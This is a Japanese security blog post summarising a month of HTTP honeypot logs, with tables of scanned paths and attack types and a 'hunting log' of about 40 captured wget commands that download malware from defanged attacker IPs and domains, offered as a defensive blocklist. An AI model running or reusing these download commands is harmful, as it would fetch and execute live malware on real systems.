ハニーポットのログ分析まとめ(2018年12月度)
2018年12月度のWOWHoneypotのログ分析まとめです。
※先月分:ハニーポットのログ分析まとめ(2018年11月度) - S-Owl
<前提>
業務でプライベートSOCで監視を行っており、自組織を狙ったものか広く一般を狙ったものかを区別したく、広く一般を狙った通信を監視する為に業務と同じくhttpの通信をハニーポットで観測しています。
■スペック
台数:1台
ソフトウェア:WOWHoneypot
対象ポート:80/tcp
設置IP:日本のIP
ドメイン:取得済、未公開
運用:2018/6/5から開始
■日次のアクセス数
1ヶ月間の総アクセス数:19,873件(前月:14,797件)
一日Tomcat管理ページへのブルートフォースが4000件以上あった日があり、前月対比増加しましたが、ほぼほぼ前月と同程度と言えるでしょう。
■アクセスパス
1ヶ月間のメソッド+パスの種類は計661種類(前月:808種類)でした。
アクセスパスのtop20は以下です。
| 件数 | 種別 | リクエスト |
| 5366 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
| 1523 | アクセス | GET / |
| 571 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /index.action |
| 133 | phpのWebShell設置の調査 | POST /qq.php |
| 131 | phpのWebShell設置の調査 | POST /confg.php |
| 113 | phpのWebShell設置の調査 | POST /1.php |
| 92 | phpのWebShell設置の調査 | GET /cmd.php |
| 90 | phpのWebShell設置の調査 | GET /shell.php |
| 86 | phpのWebShell設置の調査 | POST /xx.php |
| 85 | phpのWebShell設置の調査 | POST /test.php |
| 82 | phpのWebShell設置の調査 | POST /q.php |
| 80 | phpMyAdminの調査 | GET /phpMyAdmin/phpMyAdmin/index.php |
| 80 | phpMyAdminの調査 | GET /claroline/phpMyAdmin/index.php |
| 79 | phpのWebShell設置の調査 | POST /s.php |
| 77 | phpMyAdminの調査 | GET /tools/phpMyAdmin/index.php |
| 77 | phpMyAdminの調査 | GET /phpMyAdmin/index.php |
| 74 | phpMyAdminの調査 | GET /admin/phpMyAdmin/index.php |
| 73 | WordPressの調査 | POST /wp-login.php |
| 73 | phpMyAdminの調査 | GET /www/phpMyAdmin/index.php |
| 73 | phpMyAdminの調査 | GET /web/phpMyAdmin/index.php |
前月との比較でいうと、Tomcat管理ページへのブルートフォース攻撃が1回突出している点と、Struts2の脆弱性を攻撃するものが2倍くらい来ているのが特徴です。
アクセスパスから攻撃種別を分類し、種別毎のアクセス数を算出したリストのTop20は以下です。
| 件数 | 種別 | リクエストパターン |
| 7750 | phpのWebShell設置の調査 | 226 |
| 5366 | Tomcat管理ページへのブルートフォース攻撃 | 1 |
| 3573 | phpMyAdminの調査 | 304 |
| 1528 | アクセス | 3 |
| 571 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | 1 |
| 346 | JBossに対する調査 | 30 |
| 132 | 不正中継の調査 | 16 |
| 123 | WordPressの調査 | 10 |
| 90 | PHPWetherMapの調査 | 2 |
| 82 | ThinkPHPの脆弱性を突いた攻撃 | 15 |
| 73 | GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃 | 2 |
| 48 | IISの脆弱性(CVE-2017-7269)を突く攻撃 | 1 |
| 47 | WebDAVの調査 | 1 |
| 44 | クローリング | 2 |
| 24 | Hadoop YARN ResourceManagerの脆弱性を突く攻撃 | 1 |
| 10 | 調査 | 3 |
| 8 | D-Linkルータの脆弱性(CVE-2015-2051)の調査 | 1 |
| 6 | WordPressのXML-RPCに対する攻撃 | 6 |
| 5 | D-Linkを狙うMirai亜種の攻撃 | 3 |
| 4 | Gitの調査 | 2 |
今月新しく流行りだしたアクセスとしては、JBossに対する調査とThinkPHPの脆弱性を突いた攻撃です。
一度流行りだすと、複数の攻撃者の間ですぐに利用される傾向があるように思われます。
■ハンティングログ
主に任意のコード実行の脆弱性でマルウェア本体を取得しに行くようなログをまとめたものです。
企業等ではブラックリストとして遮断して良いものですが、IPベースのものは変更される頻度が高いため、ドメインの方が役に立ちます。
傾向は前月と変わりありません。
| 件数 | リクエスト |
| 128 | wget -c hxxp://wap.tfddos.net:57843/linux |
| 33 | wget -c hxxp://154.85.99.85:8080/5325 |
| 20 | wget -c hxxp://222.186.21.7:3220/s7 |
| 13 | wget -c hxxp://154.85.99.85:8080/whoainio |
| 12 | wget -c hxxp://154.85.99.254:4561/llsk |
| 9 | wget -c hxxp://154.85.99.85:8080/132 |
| 6 | wget -c hxxp://58.218.66.28:4546/js64 |
| 5 | wget hxxp://205.185.113.123/ex.sh |
| 5 | wget -c hxxp://154.85.99.85:8080/64364363.6 |
| 5 | wget -c hxxp://154.85.99.254:5438/9917 |
| 5 | wget -c hxxp://123.249.88.127:8887/3232df |
| 4 | wget hxxp://cnc.arm7plz.xyz/bins/set.x86 |
| 4 | wget -c hxxp://154.85.99.85:8080/53252.6 |
| 3 | wget hxxp://185.244.25.150/x |
| 2 | wget hxxp://209.141.33.119/avtechsh |
| 2 | wget hxxp://103.45.109.111:5778/root1 |
| 2 | wget -c hxxp://103.73.160.136:1314/nt |
| 2 | wget -c hxxp://103.212.33.251:896/encten26 |
| 1 | wget -P /tmp hxxp://hfs.mhacker.cc:9278/Linux.server |
| 1 | wget${IFS}hxxp://159.65.247.21/AB4g5/Kayla.arm7 |
| 1 | wget hxxp://89.46.223.70/tutos.sh |
| 1 | wget+hxxp://89.46.223.70/bins/rift.arm7 |
| 1 | wget hxxp://80.211.142.26/x |
| 1 | wget hxxp://178.128.241.137/bins/Shine.mips |
| 1 | wget hxxp://103.45.109.111:5775/root1 |
| 1 | wget -c hxxp://aaa.linuxa.club:57843/linux |
| 1 | wget -c hxxp://59.47.72.190:1111/qw1 |
| 1 | wget -c hxxp://47.93.189.22:666/VIP |
| 1 | wget -c hxxp://47.93.189.22:666/LIVIP |
| 1 | wget -c hxxp://222.186.21.226:9989/tkks |
| 1 | wget -c hxxp://222.186.21.226:9989/ki9sy |
| 1 | wget -c hxxp://222.186.21.226:9989/gaweg342 |
| 1 | wget -c hxxp://198.44.228.121:1314/123 |
| 1 | wget -c hxxp://154.85.99.254:99/llsk |
| 1 | wget -c hxxp://120.210.204.182:55896/linux260 |
| 1 | wget -c hxxp://103.73.160.136:2221/Manager |
| 1 | wget -c hxxp://103.73.160.136:1314/dos64 |
| 1 | wget -c hxxp://103.55.13.68:13333/systems |
| 1 | wget -c hxxp://103.55.13.68:13333/sshk |
| 1 | wget -c hxxp://103.212.33.251:896/sqlex |
■ドメイン名でのアクセス
10月から取得しているドメイン名に対してのアクセスです。取得はしていますが、特段公開等はしていないものです。
ドメイン指定でアクセスしてくるものはWordPressの調査、攻撃がダントツで多いです。それ以外はサイト情報の調査がある程度、と前月と変わらない傾向でした。
| 件数 | リクエスト |
| 105 | GET / |
| 73 | POST /wp-login.php |
| 40 | GET /robots.txt |
| 2 | HEAD / |
| 1 | GET /wp/wp-admin/ |
| 1 | GET /wp-admin/ |
| 1 | GET /wordpress/wp-admin/ |
| 1 | GET /sitemap.xml |
| 1 | GET /old/wp-admin/ |
| 1 | GET /dev/wp-admin/ |
| 1 | GET /demo/wp-admin/ |
| 1 | GET /blog/wp-admin/ |
| 1 | GET /backup/wp-admin/ |
| 1 | GET /ads.txt |
以上です。
